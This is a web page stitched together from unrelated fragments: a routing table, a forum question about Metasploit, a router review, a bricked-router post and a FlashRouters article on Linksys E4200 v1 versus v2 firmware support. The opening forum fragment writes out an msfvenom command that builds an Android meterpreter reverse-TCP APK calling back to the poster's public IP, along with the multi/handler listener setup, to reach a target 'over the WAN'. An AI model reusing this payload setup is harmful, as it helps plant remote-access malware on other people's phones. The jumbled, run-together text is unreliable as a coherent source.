Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 10.25.32.53 128.0.0.0 UG 0 0 0 tun0 0.0.0.0 192.168.8.1 0.0.0.0 UG 100 0 0 eth0 10.25.0.1 10.25.32.53 255.255.255.255 UGH 0 0 0 tun0 10.25.32.53 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 128.0.0.0 10.25.32.53 128.0.0.0 UG 0 0 0 tun0 174.128.229.169 192.168.8.1 255.255.255.255 UGH 0 0 0 eth0 192.168.8.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 any Idea on witch IP address I should use as an 'LHOST ' for my payload and for my listener? Hack router port 53 tcp. My target is over the WAN.not LAN. Thanks Reply. (nothing happend)than i checked my ports if thay are open in: the status of my port 4444 was stealth so that means not open.!! Hi, i am having a very weird problem i set up my payload with msfvenom here is my output:msfvenom -p android/meterpreter/reverse tcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apki tried also reverse https and http.I went to my router settings to configure port forwarding: screen shot of my router: i went to msfconsole--> use exploit/multi/handler set payload android/meterpreter/reversetcp set LHOST 192.168.10.104 (lan ip of the mashine) i also tried with Public ip it change to 0.0.0.0 set LPORT 4444 i'v tired also other ports like 443, 80, 7777.
works great out of the box. I wanted to buy this to upgrade firmware to Tomato but didn't want to spend over 200 bucks and so bought it as a refurbished router. One thing i don't like about this is the 'serial number' at the bottom of this router has been removed!!! whats up with that!! Took me a while to figure out its version and found out that this is v2. so, i can't install tomato on this :( very disappointed but the router as it is, is pretty decent and i am able to keep track of the devices attached to my network. I was also able to remove 'guest' access and limit the number of devices connected to my network. the admin utility is pretty neat especially when connected via a browser. The executable that got installed was pretty much useless for me as it couldn't identity my router! something was not right with that. I use this wth my motorola surfboard SB16141 and so far its been doing great. have had this just about over a week and will update 6 months from now.Hi AllI have a Linksys E4200 Router which got brick once i tried to update its firware Wirelessly .
now its getting powered ON , Cisco Logo is constantly ON .
I have tried 30,30,30 reset but it did not work ,none of its port showning any sign of life .
I dont see any console ports on it , however found that there are some holes on this motherbaord which acts as console ,
once you cut the nokia DKU- 5 cable and unfire and fit the pins on it as some given guide .
it might start responding on hyperterminal and then DDWRT can be put on this .
thats the information I have . just wanted to know if there is any solution to get this working on normal ????
worth 150 $ for my home us e.
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(This model is discontinued and is no longer available but we do provide support for it. You can also see a complete list of available DD-WRT models here.)
Just about every day, we receive a message from a customer just like this.
I ordered a Linksys E4200v1 (Version 1) from ABCD website and when it arrived E4200 V2. I contacted customer support and they said they could not guarantee router version. This is the third router I’ve tried to order. Are you sure that your E4200 routers are V1?
– John Q. RouterSeeker, Sheboygan WIOur response is always to customers like John (that is not his real last name) is yes. Yes, it is. And one for time for good measure, all E4200 routers available on FlashRouters.com are Linksys Cisco E4200 V1 devices.
The reason we know that all of our Linksys E4200 Routers are of the V1 variety is because our technicians check each router individually as soon as a shipment arrives. We do this for a very simple reason. Every router that we sell comes with a DD-WRT open-source firmware upgrade and only the E4200 V1 is compatible with the upgrade.
We are very aware that some sites either don’t tell you whether the E4200 is a V1 or V2 either because they don’t appreciate how important it is or else they don’t care. But rest assured that when FlashRouters ships out your Linksys Cisco E4200v1 it will be decked out with the best that DD-WRT has to offer.
Why Do Users Want a Linksys Cisco E4200 v1 vs E4200 v2?
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So what is the difference between between the two E4200 models? Why is one preferred over the other?
Most notably, the E4200 v1 is capable of being upgraded to open-source firmware upgrades because it is based on a Broadcom System on-a-Chip (SoC). Broadcom has long been the most popular chip in wireless routers so it is no surprise that the development side behind these customized firmware upgrades and advanced options have long focused on devices powered by them. Part of creating firmware updates and changes is access.
Touted as a maximum performance Cisco router, here are some of the most highly sought after and desirable features on the Linksys Cisco E4200v1 DD-WRT Router:
- Maximum Dual Band Wireless Speed up to 750 Mbps (300+450 Mbps).
- Superior Wireless HD Streaming Video via Netflix, Hulu, Youtube, and more.
- 6 Powerful Internal Antennae. Full 3×3 MIMO antenna array.
- Simultaneous Dual-Band Wireless N/G/B/A (2.4 & 5 GHz).
- 4 high speed Gigabit Ethernet ports & 1 Gigabit WAN.
- Router-based USB port for sharing data, backups, music/video files, or creating a networked printer.
For additional specs, visit our E4200 V1 DDWRT Product Page.
The E4200 V2 runs on a Marvell chip which is not supported at this time by the DD-WRT developers (and is not planned to either), making the Linksys E4200 V2 incompatible with the upgraded DD-WRT options.
This means that the E4200 V2 cannot be upgraded with popular DD-WRT options like PPTP & OpenVPN client and server integration, NoCATSPLASH and other WiFi HotSpot features, Repeater Bridge & Wireless Client Bridge Options, WPA2 Radius Authentication, Advanced Bandwidth Monitoring and many other desirable advanced setups such as 3G WAN Failover. Check out our full DD-WRT Advantages & Benefits for a more complete breakdown for the plentiful new features that a DD-WRT upgrade can provide.
Update: We now have the E4200 v1 available with Tomato firmware, with fully working OpenVPN support for VPN service providers.
Tips for Finding a V1 E4200 Cisco Router
For some reason, Cisco makes the process of figuring out which device is a V1 and V2 very confusing, and with some if the packaging, nearly impossible. But while the case for the routers may be exactly the same, the products on the inside are worlds apart.
The E4200 comes in a multitude of different boxes and variations that retailers are not willing to confirm because they do not want to go through each device or box to help you find exactly what you want… but we do!
Looking to go out hunting for a V1 on your own? By all means. Here are some general hints that we have stumbled upon regarding the external differences of E4200 V1 and V2 from our experience.
- On the image above the E4200 serial number beginning is circled. If the serial numbers begins with 01C10C, most likely you have a V1 routers. Serial Numbers beginning with 01C106 are the E4200 V2 router.
- If the router is new and in a box, it is most likely a V2, as new V1s have long been out of production and are practically impossible to locate.
- If the new E4200 router is in a box with a red stripe in the front, it is very likely a V2. If it is a grey stripe, it could be a V1 or a V2.
- On the bottom of the router: If it says E4200 V2 as the model it is a V2. If it says just E4200 it is likely a V1.
- For E4200 refurbished units which all have brown boxes and are not differentiated on the outside, try to find the version through the serial number.
- New E4200 routers purchased on Amazon are almost always V2 unless otherwise stated and even then it is a crap-shoot.
- Before attempting to flash the router with open source firmware, we would recommend turning on the router and checking the Cisco Router firmware version. If it is not version 1.0, it is very likely that the router is a V2 as well.
Sound confusing and not worth the hassle? Then you might want to skip the chase and get to the goods! Buy a guaranteed Cisco E4200 V1 with a recent, stable big/mega DD-WRT build or E4200 with Tomato firmware straight from us which includes basic DD-WRT Internet setup guide, free online support and free VPN service integration for just about any VPN PPTP setup guide.
Related posts:
Linksys E4200 Specs
e4200 bricked - Is JTAG next step?
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